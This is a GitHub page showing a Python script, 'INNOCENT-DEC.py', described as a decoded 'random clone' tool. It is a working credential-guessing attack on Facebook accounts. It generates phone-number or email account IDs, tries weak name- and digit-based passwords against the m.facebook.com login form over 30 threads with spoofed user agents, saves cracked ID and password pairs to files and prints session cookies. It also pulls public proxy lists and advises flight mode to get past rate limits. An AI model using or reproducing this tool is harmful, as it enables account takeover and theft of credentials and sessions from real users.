-
Notifications
You must be signed in to change notification settings - Fork 3
/
INNOCENT-DEC.py
248 lines (246 loc) · 10.7 KB
/
INNOCENT-DEC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
#Create By: MUMIT ISLAM HIMU
#Decode By: Tahosin
#FaceBook: Mumit Islam
#GitHub: https://github.com/MUMIT-404-CYBER
#---------------------------------------------------------------------------#
import os,sys,time,json,random,re,string,platform,base64,uuid
from bs4 import BeautifulSoup as sop
from bs4 import BeautifulSoup
import requests as ress
from datetime import date
from datetime import datetime
from time import sleep
from os import system as s
from time import sleep as waktu
try:
import requests
from concurrent.futures import ThreadPoolExecutor as ThreadPool
import mechanize
from requests.exceptions import ConnectionError
except ModuleNotFoundError:
os.system('pip install mechanize requests futures bs4==2 > /dev/null')
os.system('pip install bs4')
RED = '\033[1;91m'
WHITE = '\033[1;97m'
GREEN = '\033[1;32m'
YELLOW = '\033[1;33m'
BLUE = '\033[1;34m'
ORANGE = '\033[1;35m'
P = '\x1b[1;97m'
M = '\x1b[1;91m'
H = '\x1b[1;92m'
K = '\x1b[1;93m'
B = '\x1b[1;94m'
U = '\x1b[1;95m'
O = '\x1b[1;96m'
N = '\x1b[0m'
A = '\x1b[1;90m'
BN = '\x1b[1;107m'
BBL = '\x1b[1;106m'
BP = '\x1b[1;105m'
BB = '\x1b[1;104m'
BK = '\x1b[1;103m'
BH = '\x1b[1;102m'
BM = '\x1b[1;101m'
BA = '\x1b[1;100m'
now = datetime.now()
dt_string = now.strftime("%H:%M")
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
today = date.today()
loop = 0
oks = []
cps = []
ugen2=[]
ugen=[]
cokbrut=[]
ses=requests.Session()
princp=[]
try:
prox= requests.get('https://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks4&timeout=100000&country=all&ssl=all&anonymity=all').text
open('.prox.txt','w').write(prox)
except Exception as e:
print('')
prox=open('.prox.txt','r').read().splitlines()
for xd in range(10000):
a='Nokia'
b=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
c=random.randrange(1, 99)
d='/GoBrowser/'
e='1.6.0.'
f=random.randrange(1, 99)
uaku2=(f'{a}{b}{c}{d}{e}{f}')
ugen.append(uaku2)
os.system('xdg-open https://github.com/MUMIT-404-CYBER')
logo = ("""
\033[1;91m _____ ___ ______ _____________ ________
\033[1;92m / _/ | / / | / / __ \/ ____/ ____/ | / /_ __/
\033[1;93m / // |/ / |/ / / / / / / __/ / |/ / / /
\033[1;94m _/ // /| / /| / /_/ / /___/ /___/ /| / / /
\033[1;95m/___/_/ |_/_/ |_/\____/\____/_____/_/ |_/ /_/ \033[1;92m
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ [✓] AUTHOR \033[1;91m: \033[1;92mMUMIT ISLAM HIMU ┃
┃ [✓] TOOL \033[1;91m: \033[1;92mRANDOM CLONE ┃
┃ [✓] STATUS \033[1;91m: \033[1;92mFREE ┃
┃ [✓] SYSTEM \033[1;91m: \033[1;92mDATA & WIFI ┃
┃ [✓] GITHUB \033[1;91m: \033[1;92mMUMIT-404-CYBER ┃
┃ [✓] FACEBOOK \033[1;91m: \033[1;92mMumit Islam ┃
┃ [✓] WHATSAPP \033[1;91m: \033[1;92m+8801644777805 ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛""")
class Main:
def __init__(self):
self.id = []
self.ok = []
self.cp = []
self.loop = 0
os.system("clear")
print(logo)
print(" [01] Random Number Clone")
print(" [02] Random Email Clone ")
print(" [00] Exit")
print("\033[1;32m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
Mumit =input(" [?] Choose : ")
os.system('xdg-open https://facebook.com/groups/termuxteambd/')
if Mumit in ["1", "01"]:
num()
if Mumit in ["2","02"]:
gml()
if Mumit in [" 0", "00"]:
exit()
else:
exit()
def num():
user=[]
os.system('clear')
print(logo)
print(' [+] EXAMPLE : 017, 018, 019, 016, 013, 014 ')
print("\033[1;32m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
kode = input(' [?] Enter sim code: ')
kodex = ''.join(random.choice(string.digits) for _ in range(2))
kod = ''.join(random.choice(string.digits) for _ in range(2))
os.system('clear')
print(logo)
print(' [+] EXAMPLE : 3000, 5000, 10000, 50000 ')
print("\033[1;32m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
limit = int(input(' [?] Crack Limit : '))
for nmbr in range(limit):
nmp = ''.join(random.choice(string.digits) for _ in range(4))
user.append(nmp)
with ThreadPool(max_workers=30) as yaari:
os.system('clear')
print(logo)
tl = str(len(user))
print(' \033[1;97m[+] Total ids:\033[1;92m '+tl)
print(' \033[1;97m[+] Process has been started')
print(' \033[1;97m[!] Wait for ids ')
print(' \033[1;97m[!] Use flight mode for speed up ')
print("\033[1;32m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
for guru in user:
uid = kode+kodex+kod+guru
pwx = [kode+kodex+kod+guru,kod+guru,kodex+guru,kode+kodex+kod,]
yaari.submit(rcrack1,uid,pwx,tl)
print(' [+] Crack process has been completed')
print(' [+] Ids saved in ok.txt,cp.txt')
def gml():
user=[]
os.system('clear')
print(logo)
kode = input(' [?] Target fast name : ')
os.system('clear')
print(logo)
kodex = input(' [?] Target last name : ')
os.system('clear')
print(logo)
print(' [+] EXAMPLE : @gmail.com, @yahoo.com ')
print("\033[1;32m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
doamin = input(' [?] Terget doamin : ')
os.system('clear')
print(logo)
print(' [+] EXAMPLE : 3000, 5000, 10000, 50000 ')
print("\033[1;32m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
limit = int(input('[?] Crack Limit : '))
for nmbr in range(limit):
nmp = ''.join(random.choice(string.digits) for _ in range(1,4))
user.append(nmp)
with ThreadPool(max_workers=30) as yaari:
os.system('clear')
print(logo)
tl = str(len(user))
print(' \033[1;97m[+] Total ids:\033[1;92m '+tl)
print(' \033[1;97m[+] Process has been started')
print(' \033[1;97m[!] Wait for ids ')
print(' \033[1;97m[!] Use flight mode for speed up ')
print("\033[1;32m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
for guru in user:
uid = kode+kodex+guru+doamin
pwx = [kode,kodex,kode+kodex,kode+'@123',kode+'123',kode+'1234',kode+'12345',kode+guru,kodex+'123',kodex+'1234',kodex+'12345']
yaari.submit(rcrack1,uid,pwx,tl)
print(' [+] Crack process has been completed')
print(' [+] Ids saved in ok.txt,cp.txt')
def rcrack1(uid,pwx,tl):
global loop
global cps
global oks
global proxy
try:
for ps in pwx:
pro = random.choice(ugen)
session = requests.Session()
sys.stdout.write('\r[\033[1;92mINNOCENT\033[1;97m] > [%s/%s] > [OK\033[1;97m:-\033[1;92m%s\033[1;97m] - [CP\033[1;97m:-\033[1;91m%s\033[1;97m] \r'%(loop,tl,len(oks),len(cps))),
sys.stdout.flush()
free_fb = session.get('https://mbasic.facebook.com').text
log_data = {
"lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
"jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
"m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
"li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
"try_number":"0",
"unrecognized_tries":"0",
"email":uid,
"pass":ps,
"login":"Log In"}
header_freefb = {'authority': 'mbasic.facebook.com',
'method': 'GET',
'scheme': 'https',
'path': '/login/device-based/regular/login/?refsrc=deprecated&lwv=100&refid=8',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
'cache-control': 'max-age=0',
'origin': 'https://mbasic.facebook.com',
'referer': 'https://mbasic.facebook.com/',
'sec-ch-ua': '"Chromium";v="107", "Not=A?Brand";v="24"',
'sec-ch-ua-mobile': '?1',
'sec-ch-ua-platform': '"Android"',
'sec-fetch-dest': 'document',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'same-origin',
'sec-fetch-user': '?1',
'upgrade-insecure-requests': '1',
'user-agent': pro}
lo = session.post('https://m.facebook.com/login/device-based/regular/login/?refsrc=deprecated&lwv=100&refid=8',data=log_data,headers=header_freefb).text
log_cookies=session.cookies.get_dict().keys()
if 'c_user' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[7:22]
print(f"\033[38;5;46m[INNOCENT-OK] {uid} | {ps}")
print(f" Cookie : {coki}")
open('/sdcard/ok.txt', 'a').write( uid+' | '+ps+'\n')
oks.append(uid)
break
elif 'checkpoint' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[82:97]
print(f"\x1b[38;5;196m[INNOCENT-CP] {cid} | {ps}")
open('/sdcard/cp.txt', 'a').write( uid+' | '+ps+' \n')
cps.append(uid)
break
else:
continue
loop+=1
#sys.stdout.write(f'\r\033[m[INNOCENT] \033[1;92m%s\033[m |\033[m[\033[mOK:\033[1;92m%s\033[m] '%(loop,len(oks))),
#sys.stdout.flush()
except:
pass
Main()